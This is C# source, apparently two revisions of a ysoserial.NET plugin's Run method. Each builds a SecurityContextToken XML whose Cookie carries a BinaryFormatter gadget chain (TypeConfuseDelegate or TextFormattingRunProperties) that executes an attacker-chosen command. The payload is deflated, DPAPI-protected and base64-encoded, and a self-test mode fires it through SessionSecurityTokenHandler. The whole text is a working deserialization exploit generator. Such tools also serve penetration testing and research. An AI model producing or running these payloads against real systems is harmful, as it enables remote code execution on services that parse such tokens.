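/// <summary>
/// Produces a SecurityContextToken XML document whose Cookie element holds a
/// BinaryFormatter gadget payload, passed through DeflateCookieTransform and
/// ProtectedDataCookieTransform and then base64-encoded.
/// </summary>
/// <param name="args">Plugin command-line arguments, handed to <c>options.Parse</c>.</param>
/// <returns>The finished token XML as a string (returned as <c>object</c>).</returns>
/// <remarks>
/// Terminates the process with exit code -1 when argument parsing fails or when
/// no command was supplied. ProtectedDataCookieTransform is the DPAPI-backed
/// transform, so the encoded cookie is tied to the protection context of the
/// account that runs this tool.
/// </remarks>
public object Run(string[] args)
{
    try
    {
        // The leftover (unparsed) arguments are not used by this plugin.
        options.Parse(args);
    }
    catch (OptionException e)
    {
        Console.Write("ysoserial: ");
        Console.WriteLine(e.Message);
        Console.WriteLine("Try 'ysoserial --help' for more information.");
        System.Environment.Exit(-1);
    }

    // Token template; {0} is replaced with the base64 cookie further down.
    string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'> <Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> urn:unique-id:securitycontext:1337 </Identifier> <Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie> </SecurityContextToken>";

    // IsNullOrWhiteSpace already covers the null and empty cases.
    if (String.IsNullOrWhiteSpace(command))
    {
        Console.Write("ysoserial: ");
        Console.WriteLine("Incorrect plugin mode/arguments combination");
        Console.WriteLine("Try 'ysoserial --help' for more information.");
        System.Environment.Exit(-1);
    }

    byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);

    // Same order as in the original: compress first, then protect.
    DeflateCookieTransform deflateTransform = new DeflateCookieTransform();
    ProtectedDataCookieTransform protectedDataTransform = new ProtectedDataCookieTransform();
    byte[] deflateEncoded = deflateTransform.Encode(serializedData);
    byte[] encryptedEncoded = protectedDataTransform.Encode(deflateEncoded);

    payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));

    if (test)
    {
        // Self-test: the generated token is read by SessionSecurityTokenHandler
        // inside this process, so the supplied command is expected to run on the
        // local machine. Use it only on a disposable lab host.
        try
        {
            using (StringReader payloadText = new StringReader(payload))
            using (XmlReader tokenXML = XmlReader.Create(payloadText))
            {
                SessionSecurityTokenHandler tokenHandler = new SessionSecurityTokenHandler();
                tokenHandler.ReadToken(tokenXML);
            }
        }
        catch (Exception)
        {
            // An exception is expected here (presumably because the decoded
            // object is not a valid session token) and is deliberately ignored.
        }
    }

    return payload;
}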
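/// <summary>
/// Produces a SecurityContextToken XML document whose Cookie element holds a
/// BinaryFormatter gadget payload, passed through DeflateCookieTransform and
/// ProtectedDataCookieTransform and then base64-encoded.
/// </summary>
/// <param name="args">Plugin command-line arguments, handed to <c>options.Parse</c>.</param>
/// <returns>The finished token XML as a string (returned as <c>object</c>).</returns>
/// <remarks>
/// Terminates the process with exit code -1 when argument parsing fails or when
/// no command was supplied. ProtectedDataCookieTransform is the DPAPI-backed
/// transform, so the encoded cookie is tied to the protection context of the
/// account that runs this tool.
/// </remarks>
public object Run(string[] args)
{
    InputArgs inputArgs = new InputArgs();

    try
    {
        // The leftover (unparsed) arguments are not used by this plugin.
        options.Parse(args);

        // Copy the parsed option values into the argument object that the
        // gadget generator consumes.
        inputArgs.CmdFullString = command;
        inputArgs.Minify = minify;
        inputArgs.UseSimpleType = useSimpleType;
        inputArgs.Test = test;
    }
    catch (OptionException e)
    {
        Console.Write("ysoserial: ");
        Console.WriteLine(e.Message);
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        System.Environment.Exit(-1);
    }

    // Token template; {0} is replaced with the base64 cookie further down.
    string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> <Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> urn:unique-id:securitycontext:1 </Identifier> <Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie> </SecurityContextToken>";

    if (minify)
    {
        payload = XMLMinifier.Minify(payload, null, null);
    }

    // IsNullOrWhiteSpace already covers the null and empty cases.
    if (String.IsNullOrWhiteSpace(command))
    {
        Console.Write("ysoserial: ");
        Console.WriteLine("Incorrect plugin mode/arguments combination");
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        System.Environment.Exit(-1);
    }

    // GenerateWithNoTest is used so the generator's own test step is skipped;
    // this plugin has a separate self-test below.
    byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);

    // Same order as in the original: compress first, then protect.
    DeflateCookieTransform deflateTransform = new DeflateCookieTransform();
    ProtectedDataCookieTransform protectedDataTransform = new ProtectedDataCookieTransform();
    byte[] deflateEncoded = deflateTransform.Encode(serializedData);
    byte[] encryptedEncoded = protectedDataTransform.Encode(deflateEncoded);

    payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));

    if (test)
    {
        // Self-test: the generated token is read by SessionSecurityTokenHandler
        // inside this process, so the supplied command is expected to run on the
        // local machine. Use it only on a disposable lab host.
        try
        {
            using (StringReader payloadText = new StringReader(payload))
            using (XmlReader tokenXML = XmlReader.Create(payloadText))
            {
                SessionSecurityTokenHandler tokenHandler = new SessionSecurityTokenHandler();
                tokenHandler.ReadToken(tokenXML);
            }
        }
        catch
        {
            // An exception is expected here (presumably because the decoded
            // object is not a valid session token) and is deliberately ignored.
        }
    }

    // Second minify pass kept from the original; it runs on the filled-in
    // document, after the cookie has been inserted.
    if (minify)
    {
        payload = XMLMinifier.Minify(payload, null, null);
    }

    return payload;
}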